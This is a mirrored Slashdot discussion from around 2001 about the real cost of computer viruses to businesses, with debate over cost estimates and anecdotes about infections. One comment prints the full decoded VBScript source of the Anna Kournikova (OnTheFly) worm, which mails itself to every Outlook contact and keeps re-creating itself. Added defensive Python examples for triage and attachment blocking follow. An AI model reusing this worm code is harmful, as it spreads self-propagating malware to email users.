Slashdot Mirror


How Much Do Computer Virus Attacks Really Cost?

An Anonymous Coward asks: "I'm presently doing a research project on the actual cost of computer viruses to companies within the U.S. Computer Economics, a research firm out of Carlsbad, California, has released statistics suggesting that virus attacks have cost U.S. businesses $17.1 Billion in 2000. That figure has gone on to be quoted in a number of other publications such as an article in Information Week magazine, but beyond a simple explanation, statistics aren't presented to back up this claim. How much have virus attacks cost you or your company?" To be honest with you, I too would like to see the mathematics behind this claim.

24 of 325 comments

  1. About VBScript . . . by llywrch · · Score: 3

    I happened to see the O'Reilly book on VB Script this weekend, & was amazed to see their choice for the animal on the cover . . .

    A flu virus?

    The colophon claims this is a drawing of a Sea Urchin. I'm not convinced.

    Geoff

    --
    I think I see a trend here. Maybe for them it really would be easier to muzzle the entire internet than to produce p
  2. Re:The real cost of viruses... by MosesJones · · Score: 3

    What complete tosh.

    Let's imagine there are no virii. So I don't need to buy the tools and expertise (not a one off cost as you have to employ extra people to cover you for the virus attacks). So that's the cost before you even talk about time.

    Now in terms of time. The issue is quality time, the people who get hit aren't the bright ones, but the bright ones have to clean it up. So yes I've lost 2 hours of an average person's time, but worst of all I've just lost 1 x n hours of bright people. These people are NOT HAVING A BREAK they are WORKING ON A NON-BILLABLE TASK. Thus the cost is that every hour they work they could be billable.

    Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".

    I'll be honest, I grade virus writers several layers below pond scum, the NSA and Barney.

    --
    An Eye for an Eye will make the whole world blind - Gandhi
  3. Is that supposed to be funny? by SnakeStu · · Score: 3
    This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

    No, it assumes they're doing it instead of regular work, where regular work is defined as not dealing with the virus. It's a matter of opportunity cost.

    So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.

    That's a joke, right? There are no duplicate entries when the person is doing Activity A instead of Activity B.

    Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.

    That a given activity is included in a person's job description is irrelevant unless that is the only activity in their job description. The only person who could possibly fall into this strange category you describe would be a "Virus Recovery Specialist" who is hired to do nothing but recover from viruses. But alas, that would put a definite, fixed monetary figure on virus treatment regardless of actual virus instances. Wouldn't the anti-virus software publishers love that!

    Also, you're grossly simplifying the value of restoring from backup and the resulting lack of damage. How "regular" can your backups be before the backup processes interfere with getting the job done? And assuming you're not continuously backing up every keystroke (or other data input or manipulation) as it occurs, there will be data loss between the most recent backup and the time of restoration. Backups are important, but they're not a perfect, complete solution.

    There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in its duration. It's a minuscule blip, made slightly larger by being all at once.

    I wish that made sense even from a twisted perspective, but it doesn't. I keep hoping this is a joke, but I see it moderated as "Informative" which is a pretty scary thing to consider. Yes, delays in work exist due to phone calls, etc., but to imply that adding more delays has no impact is like saying 1 plus 1 equals 1.

    And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.

    At last, something I can agree with -- the total cost of the Sys Admin's salary shouldn't be attributed to virus recovery. I'm glad you put "total" in your statement, because otherwise we'd be right back to the apparently-facetious claim that adding labor does not add cost.

    Generally speaking, I think virus cost estimates are unreliable eye candy for bored newspeople and anti-virus software vendors. Bigger numbers equal bigger revenue for them, whether through audience attention or software sales. They're eye candy to virus authors too, for that sense of "accomplishment." Actual costs are probably impossible to ascertain and are thus a worthless goal of analysis. It's like putting a specific dollar figure on the earthquake in India -- hey, does the exact damage really matter, or should we just do what we can to help the survivors recover?

  4. Personal estimate.. by technos · · Score: 3

    We've got a few thousand users in fifteen countries. If all infections were like today's spate of VBS/SST.Worm, it'd cost us more money to find the yearly cost than the cost itself.

    But we do tend to get a nasty one about once a year. Win/CIH, ILUVYOU, etc. License costs of all the various scanners run five figures. Planning, annoying the users to update their definition files, installing the software adds on cost as well.

    Quick fudging says the actual expended cost per user, per year is under $25. (Probably closer to $18, but I'll go high to be safe) Now, if we assume there are 200 million computers in business use in the US, (Once again, high and safe) I only get $5 billion.

    Either the rest of the companies out there are doing a bad job preparing for viruses and a bad job dealing with them, or the $12.1 figure was just pulled out of someone's ass.

    --
    .sig: Now legally binding!
  5. Caution: Anecdotal evidence by rkent · · Score: 3
    Well, I haven't conducted a thorough study throughout the organization, but we *just* got hit by the Anna Kournikova virus, and here's about what happened:
    • I saw 10 messages with the same subject arrive from 10 different people, and said "hmm, a virus, I think I'll delete them."
    • A bunch of other people noticed the same thing, and started yelling over the cubes, "Hey, there's a virus going around, delete it and don't open it!"
    • Everyone did.

    So, I guess you could call that a loss of 10 or 15 minutes of "productivity" for everyone in the company. Oh no, 10 man-hours lost! And at our billing rate...!

    But frankly, not everyone was working anyway. There's at least as much time lost every day to reading online news and talking to friends, not to mention waiting for conference calls, etc etc. The impact was totally negligible, unless this virus had some nasty side effect of deleting all the files on someone's harddrive.

  6. The cost isn't because of viri it's from ... by |deity| · · Score: 3

    ... poor software. I think windows should say on the box "insecure by default". Any network program that is designed for end users and not computer geeks should have safety built in. I can see a flaw slipping by the programmers that would allow a worm or security breach. I can't imagine selling a product that is so insecure that anyone with a little experience can sit down and write a worm/virus/script to exploit, then never admit that the product was flawed.

    Maybe these companies should be able to sue Microsoft, for lost time and money.

    --
    Environmentalists are their own worst enemy. ~tricklenews.com
  7. ANSWER: Where these numbers come from! by swordgeek · · Score: 3

    Here's an example.

    Small company of 100 people, open 250 days/year.
    Annual GROSS income $5 million.
    $5m/250days/8hours = $2500/hr.

    Virus comes in, hits 24 people.
    Sysadmin can fix a machine in 15 minutes, making for six hours of work. That's $15000 in lost revenue!!! Then add on the salary for the sysadmin and the staff when they're not working, and you've got 12hr at $50/hr (average salary, including the CEO, who makes $2million in stock options), or another $600. Wow, almost $16k for a small company!!! (interesting aside: $16000/24 people comes to $666/person :-> )

    Now, let's look at this rationally. The sysadmin (a) can probably do several machines simultaneously, and (b) is already getting paid for this sort of thing. It's his job! Then there's the staff, who for their 15 minutes of downtime might take their allotted coffee break, or maybe even do some (gasp!) paperwork!

    For non-destructive viruses, I would guess the average cost to be about $5/seat infected. A far cry from the $666/seat calculated above. Here are some of the flaws that lead to this discrepancy:

    1) All work time is computer time for all staff infected.
    2) Time spent repairing the damage is outside of normal duties for the admin.
    3) All staff work at 100% efficiency all of the time.
    4) Time spent repairing the damage can't be done when the staff aren't around.

    In other words, the numbers quoted are nothing more than so much bullshit.

    --

    "People who do stupid things with hazardous materials often die." -- Jim Davidson on alt.folklore.urban
  8. Re:OnTheFly Source by zootie · · Score: 3

    You figured it out. It adds the registry entry to know if the system has been infected before, then e-mails itself to everybody in your address list. If it is Jan 26th, it opens that web page. Yes, it's weird that it tries to open that web page in the past, but who knows (maybe the author released it in the wild back then, and only now hit corporate servers).

    McAfee seems to detect it (I'm not sure if by heuristics or if it has the signature), but Norton AntiVirus doesn't detect it...

    What's interesting is how it decodes itself from the string. I kind of remember a couple of VBS viruses doing that earlier.

    It could be much worse. Many of these script viruses could be enhanced so the vbs extension doesn't show, and to use variable encoding keys, which would make it harder to create signatures.

  9. Re:How much do virus *myths* cost businesses? by micromoog · · Score: 3
    This isn't caused by virus myths per se, it's caused by lack of user education.

    Any time you have an incident like this, go see the user personally with a pair of handcuffs and a 2x4. Gradually, as users become more enlightened about IS policy, you will see a decrease in these types of messages.

  10. Re:The real cost of viruses... by update() · · Score: 3
    Hmm...what you're saying is that viruses shouldn't cost you anything because full backups should be instantly available. That's true, but the fact is that they aren't. For one thing, when a virus spreads during the day (which it will) that day's work is lost as you go back to the previous night's backup, or the one before that, to be on the safe side. And that's the best case scenario -- I have yet to work in a place where that's really what would happen. In all my workplaces, people would have lost weeks of work, or maybe everything. And that's not even mentioning the idiot admin who refused to give me a restore because of some turf squabble with a rival.

    Hey, street crime wouldn't cost anything if people all stayed inside.

  11. Stupidity by clinko · · Score: 3

    This Is pretty funny and related to the topic. It's a map of where virus'? viri? whatever... attack...
    Basically A map of stupidity...
    Is Your State Stupid?

    1. Re:Stupidity by Tower · · Score: 4

      Further proof that nobody in North Dakota owns a computer... and if they did, they would still need phone lines to connect and get a virus.
      --
      "It's tough to be bilingual when you get hit in the head."
  12. viruses cost me my sanity by omega_rob · · Score: 3
    I don't think I've personally lost much in the way of time or effort as a result of a virus, although I've seen my employer get burned a few times (notably with the "I Love You" bug).

    Mostly I've been losing my freaking sanity from listening to my uber-geeky previous boss trying to "keep on top" of each virus. He does his own insightful analysis of the thing ("a-ha! this attachment is really a VB script!"). He scours the web, digging up all the information that's readily available to anyone who wants to look for it, then spams the entire team for days on end with a torrent of "informative" e-mails that put the original virus to shame.

    I bet you all have this same guy working in your office. Admit it, it's probably you.

    omega_rob -- friend of the bonsai kitten

  13. How could it *not* cost a lot of money? by Ben+Schumin · · Score: 3
    If you don't understand how this could cost money, you've obviously never worked in a large corporate environment. An example, a company I worked at got an email vbs "virus" recently. Let's count out where the money comes from.
    • Thousands of users receive thousands of messages in their email box.
    • MIS has to go to 'infected' machines and clean each of them.
    • MIS has less time to address other important issues, blocking other people from completing tasks.
    • While MIS is fixing a machine, that user is less productive, if not completely unproductive.
    • Some users have unbacked up important data on their machines. This data can be destroyed. If someone worked on a project for two days, you're talking 16 hours of paid work lost completely. Multiply this across the entire organization.
    • Prevention costs: Site licenses or per user licenses for virus scanning solutions are expensive and rarely catch new vbs viruses.
    • Small businesses are also hit hard, because often there is no one at the location who has a clue what to do about the problem, so they have to hire some overpriced consultant to run a virus scan and clean their machines for them.

    It's not all that complicated of a concept, why do you need it broken down for you? Some Linux users are so naive about the real world.

    --

    Ben Schumin :-)

  14. "Loss" == "IRS allows you to write it off". by Anonymous Coward · · Score: 4
    I consider a financial "loss" to be anything which I can claim on my taxes at the end of the year. Nothing else constitutes real loss.

    Therefore things like software piracy, virus attacks, are not losses.

    Why is it that Microsoft PR execs speak of the "billions of dollars lost because of piracy" yet the accountants don't report dollar one to the IRS or to the shareholders? I don't see MS claiming a loss when software sits unsold on a shelf in a warehouse. Yet have someone who can't afford nor ever would have paid for software to install Office or Windows on their machine and they claim that's a $500 or $90 loss. Bullshit. Just like with movie theaters. Unsold empty seats are not a loss. But if kids sneak into those seats, all of a sudden it is, and a full fare loss too? Bullshit. Viruses cost time and are therefore a financial loss? Then MS must be responsible for loss when windows freezes up or crashes, right? Rules apply equally to everything or they mean squat.

    If it's a loss, tell it to the IRS. Can't do that? Then shut up, because it's not a real loss.

  15. The real cost of viruses... by jd · · Score: 4
    ...is zero.

    The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency.

    This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

    So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.

    Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.

    There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in its duration. It's a minuscule blip, made slightly larger by being all at once.

    Finally, there's the cost of the tools and expertise needed to fix the problem. This is a one-off cost, but'll routinely appear EVERY time there's a virus problem. And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.

    --
    It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
  16. Something to keep in mind... by dmuth · · Score: 4
    Is that getting accurate figures, at least from anti-virus companies/agencies, is going to be difficult. After all, the more serious they play out the problem to be, the more people are going to buy their products.

    Case in point, back during the Michelangelo fiasco in 1992, John McAfee claimed that "5 million computers were infected", which was nothing but hype on his part, especially as he later contradicted himself (on March 6th, 1992) by saying that only 10,000 machines had been hit.

    </rant>

    --

  17. What does reputation cost? by Ralph+Wiggam · · Score: 4

    A few years ago, the company I work for was hit by Happy99. It was a stupid little virus that infected your Winsock32.dll and sent itself to everyone you emailed. It made a backup of your uninfected dll, kept a text file of every email address it had sent itself to and was generally a polite virus. The company only had about 15 workstations at the time and it was no trouble cleaning up. The real problem was that I had to call a few dozen clients and tell them that our stupid client service people had sent them a virus. We looked like complete idiots. It turns out that only a couple of the client folks were infected and I could talk them through a cleanup over the phone. But of course those clients had sent infected emails to a few of their clients. So even the clients we didn't infect knew we had screwed up and the ones we did infect were severely pissed. I don't think anyone dropped us that week, but when our contracts came up for renewal who knows if our virus problem had an influence. So the direct cost of the virus was only a couple hours of my time. The hit to our reputation may have cost us tens or hundreds of thousands of dollars.

    -B

  18. Opportunity cost by Ungrounded+Lightning · · Score: 4

    Viruses are probably even MORE costly. Consider:

    - A virus comes in and trashes some files/configs, etc. Some people's work is lost forever and has to be redone. Those people lose days.
    - The sysadmins take down the mail server and clean things out. The whole company's email is out of service for hours.

    and so on.

    Let's suppose it's a high-tek company on the rise. And let's suppose this delays its product introduction by one day.

    Now consider the amount of money the company would make FOR THE REST OF TIME, if it hadn't been hit by the virus. Draw the graph of the amount it makes each day and color it in below the graph. That area is the amount of money it takes in.

    Now draw the same graph for the company WITH the virus hit. Start by shifting the graph to the right by one day, then lower it to account for the competition beating it to market, irate customers, delayed customers not doing as well and not buying as much product, and so on. Put that graph over the first and erase everything it covers. What's left is a financial flow that the company DIDN'T get because of the virus.

    Finally, compute how much money you'd have to put in an account at prevailing interest rates to be able to take out all that money at the time the graph shows it. THAT's the cost of the virus hit - on THAT COMPANY.

    (If there are any places where the graph WITH the virus hit is higher than the one without, it represents a deposit rather than a withdrawal. The account should go to zero when the company without the hit folds.)

    Of course predicting the actual cost means accurately predicting two futures and taking the difference. So coming up with a number is crystal-ball reading.

    Computing the PROVABLE direct loss is another story entirely.

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  19. Re:How much do virus *myths* cost businesses? by donutello · · Score: 4

    Virus myths: Ahh the good old days when the Good Times virus was clearly a hoax - unless you believed it in which case you would forward it around, fulfilling the prophecy!

    --
    Mmmm.. Donuts
  20. OnTheFly Source by zootie · · Score: 4

    I don't have costs on viruses out there. I thought it might be interesting looking at the source code of the OnTheFly virus, which was unleashed on us this morning. This is the code after the virus decodes it from a string:

    <BLOCKQUOTE>
    'Vbs.OnTheFly Created By OnTheFly
    On Error Resume Next
    Set E7O3tH65p4P = CreateObject("WScript.Shell")
    E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
    Set rOwamTjngb5= Createobject("scripting.filesystemobject")
    rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFolde r(0)& "\AnnaKournikova.jpg.vbs"
    if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
    e2nSA7HlgLC()
    end if
    if month(now) =1 and day(now) =26 then
    E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
    end if
    Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
    ZN5JKZ4xiuV= JKgSwHK773x.readall
    JKgSwHK773x.Close
    Do
    If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
    Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname, True)
    UeI22z8P4v0.writeZN5JKZ4xiuV
    UeI22z8P4v0.Close
    End If
    Loop
    Function e2nSA7HlgLC()
    On Error Resume Next
    Set D23OvxM6KRH = CreateObject("Outlook.Application")
    If D23OvxM6KRH= "Outlook"Then
    Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
    Set S6k211ge33L= j25tNZB9f8l.AddressLists
    For Each JR2mPsM2BmR In S6k211ge33L
    If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
    d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
    For X789Va3zRez= 1 To d4BD3xgwv1J
    Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
    Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
    iq72b483v3Z.To = OIE4BVYjOJ8.Address
    iq72b483v3Z.Subject = "Here you have, ;o)"
    iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
    set fWsnq8YG9f1=iq72b483v3Z.Attachments
    fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
    iq72b483v3Z.DeleteAfterSubmit = True
    If iq72b483v3Z.To <> "" Then
    iq72b483v3Z.Send
    E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
    End If
    Next
    End If
    Next
    end if
    End Function
    'Vbswg 1.50b
    </BLOCKQUOTE>
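
A static triage pass over the source posted above, as an added example that is not part of the original comment or of any antivirus product: it decodes the `Chr()` chain and pulls out the registry paths, URL and double-extension file name a responder would search for. The function names and regular expressions are assumptions; the sample lines are excerpts from the post, and nothing in them is executed.

```python
# Added example (not from the thread): static triage of a VBScript sample.
# It only reads text; nothing from the sample is ever executed.
import re

CHR_CHAIN = re.compile(r"Chr\(\s*\d+\s*\)(?:\s*&\s*Chr\(\s*\d+\s*\))+", re.I)
REG_PATH = re.compile(r'reg(?:write|read)\s*\(?\s*"([^"]+)"', re.I)
URL = re.compile(r"https?://[^\s\"']+", re.I)
DOUBLE_EXT = re.compile(r'"\\?([^"\\]+\.\w+\.vbs)"', re.I)


def unique(items):
    """De-duplicate while keeping first-seen order."""
    return list(dict.fromkeys(items))


def decode_chr_chains(source):
    """Turn each 'Chr(a) & Chr(b) & ...' run into the string it builds."""
    decoded = []
    for chain in CHR_CHAIN.finditer(source):
        codes = [int(n) for n in re.findall(r"\d+", chain.group(0))]
        decoded.append("".join(chr(c) for c in codes if c < 256))
    return decoded


def triage(source):
    """Collect the host and network indicators visible in the script text."""
    return {
        "decoded_strings": decode_chr_chains(source),
        "registry_paths": unique(REG_PATH.findall(source)),
        "urls": unique(URL.findall(source)),
        "double_extension_names": unique(DOUBLE_EXT.findall(source)),
    }


# Character codes from the regwrite line in the post.
CODES = [87, 111, 114, 109, 32, 109, 97, 100, 101, 32, 119, 105, 116, 104,
         32, 86, 98, 115, 119, 103, 32, 49, 46, 53, 48, 98]

# Excerpted lines from the posted source, held as inert text.
SAMPLE = "\n".join([
    r'E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", '
    + " & ".join(f"Chr({c})" for c in CODES),
    r'rOwamTjngb5.copyfile wscript.scriptfullname,'
    r'rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"',
    r'if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then',
    r'E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false',
    r'E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"',
])

if __name__ == "__main__":
    for kind, values in triage(SAMPLE).items():
        print(kind, values)
```

The decoded string names the generator kit, matching the trailing `'Vbswg 1.50b` comment in the post.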

  21. It can cost a lot... by NetJunkie · · Score: 5

    It can cost a lot when a business gets hit hard by a virus..but it shouldn't.

    Take today for example..that big new scary .vbs virus is running around but we are protected. Why? Not because we run Linux (We do..just not most people), but because I block *ALL* .vbs attachments coming in our network. Easy to do..works damn well. I have 14 hits of this new virus in our log but none of my users are the wiser.

    As for costs... I know when I Luv You hit many businesses were without email for DAYS. It took several admins hours and hours to clear out the systems, which costs a lot of money. Plus lost productivity from users. I don't think we'll get hit by another one like that again, hopefully admins learned their lesson.

    If you're not blocking .vbs files TODAY, you need to be asking why not.
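
The attachment block described in the comment above, sketched as an added example (not the commenter's configuration or any mail product's own code): it parses a message, resolves each attachment name the way Windows would, and reports script attachments, marking names such as `AnnaKournikova.jpg.vbs` that hide behind a harmless-looking inner extension. Only `.vbs` comes from the thread; the other blocked extensions, the decoy list and all function names are assumptions.

```python
# Added example (not from the thread): flag mail whose attachments would run
# under Windows Script Host, the check a ".vbs" gateway block performs.
from email import message_from_bytes, policy
from email.message import EmailMessage

# ".vbs" is the extension named in the comment; the other script extensions
# and the decoy list are assumptions added for illustration.
BLOCKED = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
DECOYS = {".jpg", ".gif", ".txt", ".doc", ".pdf"}


def split_extensions(filename):
    """Return (final_ext, inner_ext) the way Windows would resolve the name."""
    # Drop any path, then the trailing dots and spaces that Windows ignores.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = name.rstrip(". \t").lower().split(".")
    final = "." + parts[-1] if len(parts) > 1 else ""
    inner = "." + parts[-2] if len(parts) > 2 else ""
    return final, inner


def blocked_attachments(raw_message):
    """List (filename, extension, disguised) for every blocked attachment."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():             # walk() also visits nested parts
        filename = part.get_filename()  # Content-Disposition, else Content-Type name
        if not filename:
            continue
        final, inner = split_extensions(filename)
        if final in BLOCKED:
            hits.append((filename, final, inner in DECOYS))
    return hits


def build_sample(filename):
    """Constructed test message; the attachment body is an inert placeholder."""
    msg = EmailMessage()
    msg["From"] = "alice@example.com"
    msg["To"] = "bob@example.com"
    msg["Subject"] = "constructed sample"
    msg.set_content("body text\n")
    msg.add_attachment(b"placeholder bytes\n", maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    for name in ("AnnaKournikova.jpg.vbs", "Invoice.VBS", "photo.jpg"):
        print(name, "->", blocked_attachments(build_sample(name)) or "deliver")
```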

  22. Virus cost: by SpanishInquisition · · Score: 5

    Windows ME sells for 169.99 at Amazon.com

    --
    Je t'aime Stéphanie
  23. How much do virus *myths* cost businesses? by tenzig_112 · · Score: 5
    That's the real question.

    As a sysadmin at a small-ish company, I get dozens of bogus virus warning e-mail messages per week. That's not the problem, though. It's when they pass the message on to the company at large because they don't think I'm taking it seriously enough. It's the "I've got a virus/get me a new computer" mentality when they've downloaded too much pr0n.

    argh!